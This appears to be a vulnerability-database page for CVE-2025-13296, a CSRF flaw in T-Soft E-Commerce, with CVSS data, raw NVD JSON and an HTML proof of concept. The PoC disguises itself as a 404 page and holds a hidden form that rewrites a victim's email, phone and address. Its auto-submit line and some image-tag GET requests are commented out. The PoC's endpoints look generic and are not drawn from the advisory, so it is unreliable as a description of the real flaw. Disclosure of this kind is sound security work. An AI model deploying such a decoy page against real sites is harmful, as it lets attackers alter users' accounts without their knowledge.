Security Vulnerability Report
CVE-2025-13296 CVSS 5.4 MEDIUM

Published: 2025-12-01 12:15:46
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in Tekrom Technology Inc. T-Soft E-Commerce allows Cross Site Request Forgery. This issue affects T-Soft E-Commerce: through 28112025.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected product, as stated in the description:

T-Soft E-Commerce <= 28112025

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-13296: T-Soft E-Commerce CSRF Vulnerability -->
<!-- This PoC demonstrates how an attacker can exploit the CSRF vulnerability -->
<!-- to modify user account settings without the user's knowledge -->
<!DOCTYPE html>
<html>
<head>
  <title>404 - Page Not Found</title>
  <style>
    body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background: #f5f5f5; }
    .container { text-align: center; padding: 40px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
    h1 { color: #333; }
    p { color: #666; }
  </style>
</head>
<body>
  <div class="container">
    <h1>404 - Page Not Found</h1>
    <p>The page you are looking for might have been removed.</p>
  </div>
  <!-- Hidden CSRF form; the submit call in the script below is left commented out -->
  <!-- Target: T-Soft E-Commerce user profile modification endpoint -->
  <form id="csrfAttack" action="https://target-site.com/tsoft/user/profile/update" method="POST" style="display: none;">
    <!-- Set CSRF token to an empty value to test if validation is missing -->
    <input type="hidden" name="csrf_token" value="" />
    <!-- User profile fields that can be modified via CSRF -->
    <input type="hidden" name="email" value="[email protected]" />
    <input type="hidden" name="phone" value="+1234567890" />
    <input type="hidden" name="address" value="Modified via CSRF attack" />
    <!-- Additional sensitive fields -->
    <input type="hidden" name="action" value="update_profile" />
  </form>
  <script>
    // Would auto-submit the form when the page loads;
    // the actual submit call is commented out below
    window.onload = function() {
      // In a real attack, this would be hidden and automatic
      // document.getElementById('csrfAttack').submit();
      console.log('CSRF PoC loaded - form ready for submission');
    };
  </script>
</body>
</html>
<!-- Alternative PoC: Image-based CSRF (GET request) -->
<!--
<img src="https://target-site.com/tsoft/api/user/logout" width="0" height="0" border="0">
<img src="https://target-site.com/tsoft/admin/settings?enable_debug=1" width="0" height="0">
-->

References

https://www.usom.gov.tr/bildirim/tr-25-0421
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13296",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-01T12:15:45.900",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cross-Site Request Forgery (CSRF) vulnerability in Tekrom Technology Inc. T-Soft E-Commerce allows Cross Site Request Forgery.This issue affects T-Soft E-Commerce: through 28112025."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0421",
        "source": "[email protected]"
      }
    ]
  }
}